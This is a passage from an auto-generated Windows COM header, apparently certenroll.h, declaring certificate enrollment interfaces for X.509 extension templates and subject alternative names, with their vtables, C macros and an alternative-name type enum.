            __RPC__in IX509ExtensionTemplateName * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionTemplateName * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateName )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509ExtensionTemplateNameVtbl;

    interface IX509ExtensionTemplateName
    {
        CONST_VTBL struct IX509ExtensionTemplateNameVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionTemplateName_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionTemplateName_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionTemplateName_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionTemplateName_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionTemplateName_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionTemplateName_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionTemplateName_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionTemplateName_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionTemplateName_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionTemplateName_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionTemplateName_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionTemplateName_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionTemplateName_InitializeEncode(This,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeEncode(This,strTemplateName) ) 

#define IX509ExtensionTemplateName_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionTemplateName_get_TemplateName(This,pValue)	\
    ( (This)->lpVtbl -> get_TemplateName(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionTemplateName_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionTemplate_INTERFACE_DEFINED__
#define __IX509ExtensionTemplate_INTERFACE_DEFINED__

/* interface IX509ExtensionTemplate */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionTemplate;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab312-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionTemplate : public IX509Extension
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in_opt IObjectId *pTemplateOid,
            /* [in] */ LONG MajorVersion,
            /* [in] */ LONG MinorVersion) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_TemplateOid( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_MajorVersion( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_MinorVersion( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionTemplateVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionTemplate * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionTemplate * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionTemplate * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [in] */ __RPC__in_opt IObjectId *pTemplateOid,
            /* [in] */ LONG MajorVersion,
            /* [in] */ LONG MinorVersion);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateOid )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_MajorVersion )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_MinorVersion )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        END_INTERFACE
    } IX509ExtensionTemplateVtbl;

    interface IX509ExtensionTemplate
    {
        CONST_VTBL struct IX509ExtensionTemplateVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionTemplate_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionTemplate_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionTemplate_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionTemplate_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionTemplate_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionTemplate_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionTemplate_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionTemplate_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionTemplate_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionTemplate_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionTemplate_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionTemplate_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionTemplate_InitializeEncode(This,pTemplateOid,MajorVersion,MinorVersion)	\
    ( (This)->lpVtbl -> InitializeEncode(This,pTemplateOid,MajorVersion,MinorVersion) ) 

#define IX509ExtensionTemplate_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionTemplate_get_TemplateOid(This,ppValue)	\
    ( (This)->lpVtbl -> get_TemplateOid(This,ppValue) ) 

#define IX509ExtensionTemplate_get_MajorVersion(This,pValue)	\
    ( (This)->lpVtbl -> get_MajorVersion(This,pValue) ) 

#define IX509ExtensionTemplate_get_MinorVersion(This,pValue)	\
    ( (This)->lpVtbl -> get_MinorVersion(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionTemplate_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0022 */
/* [local] */ 

typedef 
enum AlternativeNameType
    {
        XCN_CERT_ALT_NAME_UNKNOWN	= 0,
        XCN_CERT_ALT_NAME_OTHER_NAME	= 1,
        XCN_CERT_ALT_NAME_RFC822_NAME	= 2,
        XCN_CERT_ALT_NAME_DNS_NAME	= 3,
        XCN_CERT_ALT_NAME_DIRECTORY_NAME	= 5,
        XCN_CERT_ALT_NAME_URL	= 7,
        XCN_CERT_ALT_NAME_IP_ADDRESS	= 8,
        XCN_CERT_ALT_NAME_REGISTERED_ID	= 9,
        XCN_CERT_ALT_NAME_GUID	= 10,
        XCN_CERT_ALT_NAME_USER_PRINCIPLE_NAME	= 11
    } 	AlternativeNameType;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0022_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0022_v0_0_s_ifspec;

#ifndef __IAlternativeName_INTERFACE_DEFINED__
#define __IAlternativeName_INTERFACE_DEFINED__

/* interface IAlternativeName */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IAlternativeName;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab313-217d-11da-b2a4-000e7bbb2b09")
    IAlternativeName : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromString( 
            /* [in] */ AlternativeNameType Type,
            /* [in] */ __RPC__in BSTR strValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromRawData( 
            /* [in] */ AlternativeNameType Type,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strRawData) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromOtherName( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strRawData,
            /* [in] */ VARIANT_BOOL ToBeWrapped) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Type( 
            /* [retval][out] */ __RPC__out AlternativeNameType *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_StrValue( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RawData( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IAlternativeNameVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IAlternativeName * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IAlternativeName * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IAlternativeName * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IAlternativeName * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IAlternativeName * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IAlternativeName * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IAlternativeName * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromString )( 
            __RPC__in IAlternativeName * This,
            /* [in] */ AlternativeNameType Type,
            /* [in] */ __RPC__in BSTR strValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromRawData )( 
            __RPC__in IAlternativeName * This,
            /* [in] */ AlternativeNameType Type,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strRawData);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromOtherName )( 
            __RPC__in IAlternativeName * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strRawData,
            /* [in] */ VARIANT_BOOL ToBeWrapped);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IAlternativeName * This,
            /* [retval][out] */ __RPC__out AlternativeNameType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_StrValue )( 
            __RPC__in IAlternativeName * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IAlternativeName * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IAlternativeName * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IAlternativeNameVtbl;

    interface IAlternativeName
    {
        CONST_VTBL struct IAlternativeNameVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IAlternativeName_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IAlternativeName_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IAlternativeName_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IAlternativeName_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IAlternativeName_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IAlternativeName_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IAlternativeName_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IAlternativeName_InitializeFromString(This,Type,strValue)	\
    ( (This)->lpVtbl -> InitializeFromString(This,Type,strValue) ) 

#define IAlternativeName_InitializeFromRawData(This,Type,Encoding,strRawData)	\
    ( (This)->lpVtbl -> InitializeFromRawData(This,Type,Encoding,strRawData) ) 

#define IAlternativeName_InitializeFromOtherName(This,pObjectId,Encoding,strRawData,ToBeWrapped)	\
    ( (This)->lpVtbl -> InitializeFromOtherName(This,pObjectId,Encoding,strRawData,ToBeWrapped) ) 

#define IAlternativeName_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IAlternativeName_get_StrValue(This,pValue)	\
    ( (This)->lpVtbl -> get_StrValue(This,pValue) ) 

#define IAlternativeName_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IAlternativeName_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IAlternativeName_INTERFACE_DEFINED__ */


#ifndef __IAlternativeNames_INTERFACE_DEFINED__
#define __IAlternativeNames_INTERFACE_DEFINED__

/* interface IAlternativeNames */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IAlternativeNames;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab314-217d-11da-b2a4-000e7bbb2b09")
    IAlternativeNames : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IAlternativeName **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IAlternativeName *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IAlternativeNamesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IAlternativeNames * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IAlternativeNames * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IAlternativeNames * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IAlternativeNames * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IAlternativeNames * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IAlternativeNames * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IAlternativeNames * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IAlternativeNames * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IAlternativeName **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IAlternativeNames * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in IAlternativeNames * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IAlternativeNames * This,
            /* [in] */ __RPC__in_opt IAlternativeName *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IAlternativeNames * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IAlternativeNames * This);
        
        END_INTERFACE
    } IAlternativeNamesVtbl;

    interface IAlternativeNames
    {
        CONST_VTBL struct IAlternativeNamesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IAlternativeNames_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IAlternativeNames_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IAlternativeNames_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IAlternativeNames_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IAlternativeNames_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IAlternativeNames_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IAlternativeNames_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IAlternativeNames_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IAlternativeNames_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IAlternativeNames_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IAlternativeNames_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IAlternativeNames_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IAlternativeNames_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IAlternativeNames_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionAlternativeNames_INTERFACE_DEFINED__
#define __IX509ExtensionAlternativeNames_INTERFACE_DEFINED__

/* interface IX509ExtensionAlternativeNames */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionAlternativeNames;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab315-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionAlternativeNames : public IX509Extension
    {
    public:
